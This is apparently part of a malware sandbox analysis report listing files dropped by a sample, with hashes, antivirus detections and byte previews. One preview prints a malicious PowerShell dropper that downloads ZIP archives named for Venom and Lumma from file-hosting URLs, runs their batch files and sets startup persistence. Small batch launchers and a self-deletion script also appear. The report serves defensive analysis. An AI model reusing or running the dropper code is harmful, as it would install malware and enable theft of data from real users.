                                                                                    SHA-256:4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
                                                                                    SHA-512:80EA862F84FC9FBF67607D31177161D908F12FA720C0984AD20BDB9E33C215E781BE3C20B7AB327476966F4E224A993E557975536A229EC8B1F5DD531613A980
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.........."...0..4............... .....@..... .......................@............`...@......@............... ...............................`..................x&........................................................................... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H...........h...........(G...............................................0..).............(.....o.......-..........*........*J.(.....(....}....*.0..I........{......~....~....o....,.r...ps....z.{......~....~....o....,.r=..ps....z*..{....o....,.rs..ps....z..}....*...0..C........{.......o....,%r...p.....(..........(....(....s....z..s.....(....*.s....t....*..0..T....... ..75 ?h.. .... .... ..... .....O .... .... ....s.........(....(...+o....s.........*V.(......}......}....*...0..........
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):182
                                                                                    Entropy (8bit):4.931753548379707
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:jdKZOMERE2J5xAI2JHyMD2UMERE2J5xAI2JH4KReJsjIdKZOMERE2J5xAINIK4Iv:jdKoFi23f+yMD2UFi23f+4/dKoFi23fr
                                                                                    MD5:921FD71A35A531B0B52E31C36C2DAB6D
                                                                                    SHA1:FFBAC53652FE1F8C015A7D91CD396ED1EE37EE2C
                                                                                    SHA-256:6D91CC018A2BE12D73ADF48E0D348B668DF53F80CFD253C967F62D619C96705F
                                                                                    SHA-512:1CABE7B03F5FFAA5839BA923EC61997FE869B6EF58EB1353220B0FC4DB544FE3624F274B48421BE5D7EC99B4616AC3E142EDD2FADFDCBD0B534400B13159C3C6
                                                                                    Malicious:false
                                                                                    Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\IXDaI.exe"..if exist "C:\Users\user\AppData\Local\Temp\IXDaI.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\7760095b.bat"..
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11672576
                                                                                    Entropy (8bit):6.48028581980635
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:LzqI+neqpiuNs3zHlse+SRWSlwEO5zwnJY:N5uNs3zF5+SNJOk
                                                                                    MD5:D3785ED170CDB1F4784D3DFF3A61DAE0
                                                                                    SHA1:4BB2D65976DB66FC918C354AA4B2D1162B2420BA
                                                                                    SHA-256:505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
                                                                                    SHA-512:3D5C970C602F31E873E655EAB73DAEE3823717E10CF0D660FF59F333F735E3F0C6B13ED15875C10BB39876CC24E48CC73937382F40C9A364BD0DB7745BFF29DD
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\B552.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.,I....................@.....................................4....`... ......................................P..N....`..X.......W...................`.............................. ...(....................d..X............................text....+I......,I.................`.``.data........@I......0I.............@.`..rdata..P.X...T...X...S.............@.`@.pdata............................@.0@.xdata..P...........................@.0@.bss.....~...........................`..edata..N....P......................@.0@.idata..X....`......................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...W...........................@.0..reloc.......`.......t..............@.0B................................................................................................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):338427
                                                                                    Entropy (8bit):7.999421481430211
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:NGuYnZvCloK9BLa2VS1T6dH5IxUt/eiFLj//4RLu7HuayKy8R5spw0:EuYhClokzVjdyx6Tj/gRsHpyKy8wS0
                                                                                    MD5:CCC6A76DAC238257CF8CFFE352B3E5C4
                                                                                    SHA1:B2705A5A08E1FAA0E4D3097F79EA9FD09C8189FA
                                                                                    SHA-256:3C2768836296463361FFBC8F105F713B1059EA6F22C3272FFB9C77D41CA86024
                                                                                    SHA-512:611628A9D2F81012A04F6B5E8A43C111ACF7DB1FED3042A4609A7FC8F6591775E013580A73F621B96F81D8B3C831F0698D7070451B6332E3076041C04097F42A
                                                                                    Malicious:false
                                                                                    Preview:`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e..*...6.iE[..G.064...^P..j^..*H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^.....?...:gd.u.Z..6....oI..!.9...m.|.0..7.oR..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):398336
                                                                                    Entropy (8bit):5.845773382535582
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
                                                                                    MD5:640C7C7EFAE54CC8DB95B07151C1E70D
                                                                                    SHA1:F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
                                                                                    SHA-256:E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
                                                                                    SHA-512:694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):40376
                                                                                    Entropy (8bit):5.902054884820747
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                                    MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                    SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                                    SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                                    SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):49
                                                                                    Entropy (8bit):4.476456017363834
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDFRKnwdJI0CHhSnu/:hGwdxCHYno
                                                                                    MD5:119839A00B05FCD9AED401736B817ACF
                                                                                    SHA1:07F23D288EC1E8DE71F7D262D00172D419725EE2
                                                                                    SHA-256:340034255D14BA5EE3E9F794064D81B675E2ACA6452D86F461583577C051EAF4
                                                                                    SHA-512:545C68B5BB9B8249D8FEDA76792D9279AEE0482E26C261B9F2A5FE97D3496D208A6DB31BE3536D947CE1AF895AEA65365E9935738268129C8A6AC5FD3CC5CBD2
                                                                                    Malicious:false
                                                                                    Preview:@echo off..start "" /b "lm.exe" >nul 2>&1..exit..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):106495
                                                                                    Entropy (8bit):7.9980244323728495
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:8cK8hPo9OmXlpd2zSAaSJAMCjOnjTaGcAXb87:8toOhl2mAaSOFIT6AXw7
                                                                                    MD5:3D5A228A61FC2FBFAFB6D63A6F6C77A7
                                                                                    SHA1:D76DDCBB0EEF778F5C72B628A5696B8F67EDD32C
                                                                                    SHA-256:1D6C79DFFF9E47928457C86CDEFAEAAB185B3476FD3F568AD668252CD53F8877
                                                                                    SHA-512:1B04BCA4C65377B406E04A8267CAB9B5D853B5E339A3B2AEC6ECEB70A8C3A64CBA5DE390193F9CC0DD26A7B57A0C520622DAE9DFAF2EB3202C7EAA3D48DA5CD5
                                                                                    Malicious:false
                                                                                    Preview:`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/*...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}*....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P.K....Q3.QJ>YZ.....*Hz..T.IX.t.+2.eO.$.8R
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):398336
                                                                                    Entropy (8bit):5.845773382535582
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
                                                                                    MD5:640C7C7EFAE54CC8DB95B07151C1E70D
                                                                                    SHA1:F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
                                                                                    SHA-256:E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
                                                                                    SHA-512:694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):49
                                                                                    Entropy (8bit):4.517272343894447
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDFRKnwdTCHhSnu/:hGwdWHYno
                                                                                    MD5:1AB4DC21DCB24F5B7345CE5C0B794B82
                                                                                    SHA1:18F722AD31EE9D81181F8CA2CEF60A70B03BB030
                                                                                    SHA-256:AC2103023D146E62C3B708384AE0ED044D17258901272068EF93C15C9F5AA06E
                                                                                    SHA-512:83F1D566B8F5B7875811762433CF7C2722225C789A3B917B2C4184A442D9D6AF9C6FE703CE354D223824CFE8ED86E6E7780EC02008C093298FBCD3C08840DBDD
                                                                                    Malicious:true
                                                                                    Preview:@echo off..start "" /b "vm.exe" >nul 2>&1..exit..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):40376
                                                                                    Entropy (8bit):5.902054884820747
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                                    MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                    SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                                    SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                                    SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):988672
                                                                                    Entropy (8bit):7.331838963074561
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
                                                                                    MD5:2B3ECC21382E825D6FE0812A717717EB
                                                                                    SHA1:F3386531F7726A4F673003BF6CB5806843B76FFB
                                                                                    SHA-256:AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
                                                                                    SHA-512:7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 16%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\7Y18r(14).exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):15872
                                                                                    Entropy (8bit):7.031075575407894
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                                                                    MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                    SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                                                                    SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                                                                    SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):528925
                                                                                    Entropy (8bit):7.999322324722934
                                                                                    Encrypted:true
                                                                                    SSDEEP:12288:xyY9C/+kpVD3KhE7vLg5C9pyKy8/i4wDW9Ns8PDjxQ1x8MjR6DngMl:xhs/+oksg5CTyYa4wa9JJbus
                                                                                    MD5:C326FE916E749D691CAEDBC7851F984C
                                                                                    SHA1:ABF574E081288F7FC0D270A4ABD79372C7DAA3F2
                                                                                    SHA-256:6E6199329BB1C1989E8D5266A5F57119E4454A4716DC5A1D16638D4BE645C1F0
                                                                                    SHA-512:EF8899ADEB8396EF207243711038217BD50E1800C6BAA2D70C869A11BDA1F21D04D1C8CBC381111BF9311385116F6A27AD1DFF3A8E72D278079FBCDB46440293
                                                                                    Malicious:false
                                                                                    Preview:PK.........{.X.8..(...)......data.bin..,..`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e..*...6.iE[..G.064...^P..j^..*H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^....
                                                                                    Process:C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2511
                                                                                    Entropy (8bit):5.252889385795675
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:mMB+fxMBQDwX7jCe9HSVdat4ZLd/FK16hiHKiK/OQ/v6/Q6RER/h0JweXuH:mM0fxMi4CQo1tg1lthpS
                                                                                    MD5:882093038301A8EB3C3310CE46E1075E
                                                                                    SHA1:157D0D5855C2A66DFE02E06C43B4C56C640B64E6
                                                                                    SHA-256:ED089944CAF15DB2638AA0BBB7B6FC7BECD4F4D5C08C12F4922AA7BC811046A9
                                                                                    SHA-512:0F2FB0F4DC18C2C0CB46897D70359D3734F7F737456860083AE9932820FD2AB58DB550F491F594D0531D9465D43BD4FAA6D5B9967716563C7A9E09AEB67DCFC9
                                                                                    Malicious:true
                                                                                    Preview:$url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"..$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"..$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVenom")..$tempDir2 = [System.IO.Path]::Combine($env:TEMP, "ExtractedLumma")..$zipPath1 = [System.IO.Path]::Combine($env:TEMP, "venom.zip")..$zipPath2 = [System.IO.Path]::Combine($env:TEMP, "lumma.zip")....function Download-File {.. param (.. [string]$url,.. [string]$outputPath.. ).. Invoke-WebRequest -Uri $url -OutFile $outputPath..}....function Run-BatFiles {.. param (.. [string]$directory.. ).. $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File.. foreach ($batFile in $batFiles) {.. Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow.. }..}....function Add-VbsToStartup {.. param (.. [string]$batFilePath
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):296998
                                                                                    Entropy (8bit):7.998052107159895
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:/3eshJ2mAOSiLZh4CPIKBZW7ZN7o8PDj6QN9Q1xipM8QHxwM4Dngzi:feshYbDi1OwDW9Ns8PDjxQ1x8MjR6Dnz
                                                                                    MD5:8090D3FF2BF334B750478761C31BF25E
                                                                                    SHA1:EC048B210369DD140BE8ED66D07AC4466AB5F7E4
                                                                                    SHA-256:63B0E303A05AD2EB2A93E2F9CD96E50361CF1E0D29F9CAB8B0A98D1185347F8A
                                                                                    SHA-512:DFBBB3468C2012BDF920B8C09DFDB655F3E1369EA9465228E505F1D1DE3AEF9EC9757D7B501C4091C3FF7859F57D2CA646430B4E5CF0E5292AB602B0FB28F654
                                                                                    Malicious:false
